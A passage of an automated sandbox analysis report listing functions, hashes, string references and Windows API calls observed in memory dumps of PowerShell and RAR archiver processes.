Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df65c8ed74ed8769cc0551f7294d202d5928e1895130d2c2169bbe5d84b883a0
Instruction ID: d69606373d9e3719fe7ea0a3b963d359d9550eec97c98c083d2abeff78c4b452
Opcode Fuzzy Hash: df65c8ed74ed8769cc0551f7294d202d5928e1895130d2c2169bbe5d84b883a0
Instruction Fuzzy Hash: BEF05E32A4D545CFDB94EF5CE4428A877E4EF4932071540B6E14ECB4A3CA25EC49C784

Function 00007FFAA94778CD Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6bc8c6caa1746d8e89a5865c072bdb6f496e93d066a868aefa254ba884f967
Instruction ID: 9763b42cdd2d6013b6f3d17cd30bf9131b8e04178d1940d39c0b12426d0bb573
Opcode Fuzzy Hash: 6c6bc8c6caa1746d8e89a5865c072bdb6f496e93d066a868aefa254ba884f967
Instruction Fuzzy Hash: 5AE0CD3024D7864FD345962CD040BB9BA819F8A310F94587DF4DDC73C3C55D54419392

Non-executed Functions

Function 00007FFAA9478BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^7, xrefs: 00007FFAA9478C12
N_^J, xrefs: 00007FFAA9478C8A
N_^F, xrefs: 00007FFAA9478C7A
N_^4, xrefs: 00007FFAA9478BFA

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 1cd2c07a3268aa8ebcd90590385cf68d3d52b2af61b588c0c0cf42b5b0a1b759
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 492138F7A080254ED3017BFDFC259D93B80DF9523574902B2D29CCF143E914B19A8ACA

Analysis Process: powershell.exePID: 5736, Parent PID: 7924COMMON

Executed Functions

Function 00007FFAA95717D9 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

@n}, xrefs: 00007FFAA95719C6

Memory Dump Source

Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd

Similarity

API ID:
String ID: @n}
API String ID: 0-2187169710
Opcode ID: 396ae0b3a4289378dd5899685ec062c7162ec420501fd3ab524516c4320c0618
Instruction ID: 95327f7525dcf8627226dc2ddf02c9e178c4f10009ee890190a050323a65e39c
Opcode Fuzzy Hash: 396ae0b3a4289378dd5899685ec062c7162ec420501fd3ab524516c4320c0618
Instruction Fuzzy Hash: 87614932E0DB8A4FE7559B2C98965B53BE5DF8A220B1845BFD04DC7193EE14AD0EC381

Function 00007FFAA9571A2C Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece3ce9482bf21ce800060e8d616f9c89da71c064b25a684040973d1d074049c
Instruction ID: f7a03e3a7529bdbf67f0f756a3632abfecd150a10706c05d1e5d10490311fd00
Opcode Fuzzy Hash: ece3ce9482bf21ce800060e8d616f9c89da71c064b25a684040973d1d074049c
Instruction Fuzzy Hash: 82813831D0E68A8FD7569B6898A65B57FE5EF4B210B0945FFC04DC7093E918A90EC3C2

Function 00007FFAA94A4DEB Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004A.00000002.1913208170.00007FFAA94A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA94A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_74_2_7ffaa94a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140e59516adf71d7cd3e886773f66b0c55fa0c1453ba5ef8b0e22e777fae9f5c
Instruction ID: e5aef8e67a8fddadece1e6a8778f2eb0db4bed9e338884ebe5ead9ab12ddd2e6
Opcode Fuzzy Hash: 140e59516adf71d7cd3e886773f66b0c55fa0c1453ba5ef8b0e22e777fae9f5c
Instruction Fuzzy Hash: BD618070E09A498FDB48DF6CC8556ADBBF1EF5A310F14817ED00ED7292CA35A846CB81

Function 00007FFAA9571A7D Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004A.00000002.1914019649.00007FFAA9570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_74_2_7ffaa9570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7936bb2b62bfaa7cbc381e12f9ea5e401ee7bfc5551ad9b74f2241c80561ec
Instruction ID: 63a71af613fe51779dd32ff158bf3f08c8ecdd4830a677b90a814246bb87bf0c
Opcode Fuzzy Hash: 2e7936bb2b62bfaa7cbc381e12f9ea5e401ee7bfc5551ad9b74f2241c80561ec
Instruction Fuzzy Hash: A9410421D0EA878FE3669B6844A61B57BA5EF4B201B4D84FFC08DC7093F918A90D8381

Function 00007FFAA94A3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004A.00000002.1913208170.00007FFAA94A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA94A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_74_2_7ffaa94a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 479efd16ea84b236b65a2c3c78bc079abb2a626731f19f5cd14335574debdeea
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: F001677111CB0C8FD744EF0CE451AA5B7E0FB99364F50056DE58AC3661DA36E881CB45

Analysis Process: rar.exePID: 7696, Parent PID: 8024COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1219
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF74EE854C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF74EE85935
default.sfx, xrefs: 00007FF74EE860F4
EML, xrefs: 00007FF74EE85D6B
SND, xrefs: 00007FF74EE85D11
OFF, xrefs: 00007FF74EE85E4B
*?., xrefs: 00007FF74EE8598C
rar.log, xrefs: 00007FF74EE85CE5
NUL, xrefs: 00007FF74EE85DB3
stdin, xrefs: 00007FF74EE86236
SFX, xrefs: 00007FF74EE860CC
ERR, xrefs: 00007FF74EE85D40
LOG, xrefs: 00007FF74EE85CD0
*.%ls, xrefs: 00007FF74EE859AF
stdin, xrefs: 00007FF74EE8672D
VER, xrefs: 00007FF74EE85EBA
+, xrefs: 00007FF74EE86535

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 1cf28cc1ed9762fcc1d1c5344c37d58eee7732e4e98eab68bc42232bc7b1d585
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: 33C28B62D0C1E3C5FA64BB2481442BDB691BB017A4FD98D35CA4E4B2C6DEEDE948C371

Function 00007FF74EE71884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON

Download Yara Rule

Strings

rar, xrefs: 00007FF74EE718AA
%s%s , xrefs: 00007FF74EE72A46
BK, xrefs: 00007FF74EE719C5
,6, xrefs: 00007FF74EE72F83
q:, xrefs: 00007FF74EE719DA
.ext, xrefs: 00007FF74EE718C0
exe, xrefs: 00007FF74EE71897
sfx, xrefs: 00007FF74EE71884

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: 98f5ae8cc36bb269fb1f5a1ad2eab247a6cc4144c0524aa452d763e2f3d19770
Instruction ID: e519b8c4e50e07c78a249be7e0e9642279befbf51c1a0cf129485aa3defa1812
Opcode Fuzzy Hash: 98f5ae8cc36bb269fb1f5a1ad2eab247a6cc4144c0524aa452d763e2f3d19770
Instruction Fuzzy Hash: 5FE29D66A0CBE2C9FB20FB25D8401EDA7A1FB897A8F854135CA4D07796DFB9D544C320

Function 00007FF74EEB48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF74EEB4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF74EE8CC90), ref: 00007FF74EEB4AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB492E
GetVersionExW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB4993
LoadLibraryW.KERNEL32(?,?,?,00007FF74EEA7E7D), ref: 00007FF74EEB499F

Strings

rarlng.dll, xrefs: 00007FF74EEB493A

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: 2d0621bc9d51cd659ff6f25a050bcccc032c75153dc30a64be5273d754ae0abb
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: 21314F3161CA62C9FB64FB25E8402F9B3A4FB457A4FC04135EA8D46A94EF7CD545C720

Function 00007FF74EE946EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE94736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE9476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE9477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE947A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF74EE94620,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE947B2

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: d4d2c3dbe283a1a6c7136d4c9580eba93854c21015fb8a5ea243f5ec260100ee
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: 2441953260C695D6FA24FB25E5802E8A3A0FB497B4F804331EABD477C5DFACD5558710

Function 00007FF74EE8901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF74EE8904D
CryptGenRandom.ADVAPI32 ref: 00007FF74EE89061
CryptReleaseContext.ADVAPI32 ref: 00007FF74EE89074

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: 06872ad9e8687b486d4028302dea00e0e7f16ae7d250f3144b5c0f53c7747125
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: 00014B26B0C6A082F700AB16A844339A762FBC4FE0F588431DF4D53B68CEBED9468700

Function 00007FF74EE7B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF74EE7B900

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
Instruction ID: ec9b0ae0f3dca80dc66cf0ac2626e41bdf869c6f038743e8404fe19cb28ffde8
Opcode Fuzzy Hash: baabab1820374ba2820f1ea48004dae6935bb02fa1d5f0f7c129e9593b88d397
Instruction Fuzzy Hash: 2E22AF22A0C6A2D6F714FF30D4401FEBBA1FB50768F884135DA8D56299DFB8E942C760

Function 00007FF74EE9AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF74EE9B0C7

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20844e19174b7c935af85f2ccf491c603f06846682666545c1139ebf205162ad
Instruction ID: 689117533171be7d6bcecf9d92a7bad5cd9878a760bb35d2aa9b3bb8bd7fc05d
Opcode Fuzzy Hash: 20844e19174b7c935af85f2ccf491c603f06846682666545c1139ebf205162ad
Instruction Fuzzy Hash: 4571E632A0979586E704FF36E4052ED73D1FB88BA4F044135DB5D8B399DFB8A08287A0

Function 00007FF74EEB3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF74EEB3EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF74EEB3E8F,?,00007FF74EEA7E90), ref: 00007FF74EEB3F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EEB43C6

Strings

\, xrefs: 00007FF74EEB4519
DIALOG, xrefs: 00007FF74EEB4227
*messages***, xrefs: 00007FF74EEB4050
DIRECTION, xrefs: 00007FF74EEB4243
MENU, xrefs: 00007FF74EEB4235
RTL, xrefs: 00007FF74EEB437A
,, xrefs: 00007FF74EEB43FB
$%s:, xrefs: 00007FF74EEB439E
STRINGS, xrefs: 00007FF74EEB4219
*messages***, xrefs: 00007FF74EEB4080
@%s:, xrefs: 00007FF74EEB43A5

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
Instruction ID: e0f50e56f05564dd7f114e5e312e3716e36cd1ed1db40f989394e75bc7047a52
Opcode Fuzzy Hash: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
Instruction Fuzzy Hash: E622A322A1DAA2D9FB20FB15D4406B9A361FF447A4FC04235DA8E476D9EFBCE944C350

Function 00007FF74EE84FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF74EE85043
wcschr.LIBVCRUNTIME ref: 00007FF74EE85129

Strings

stdin, xrefs: 00007FF74EE852C2
.rar, xrefs: 00007FF74EE850E6
FUADPXETK, xrefs: 00007FF74EE8503C
.rar, xrefs: 00007FF74EE8508E
.part, xrefs: 00007FF74EE850A5
AFUMD, xrefs: 00007FF74EE85122

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: d23928c608e05f6f1266101330b824c8ca39fd972b43dc50c364882908fa0066
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: ADC18321E1CAE2C4FB24BF2588511FCA291BF467A4FC45135E94E4B6DADEACE509C330

Function 00007FF74EEB7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

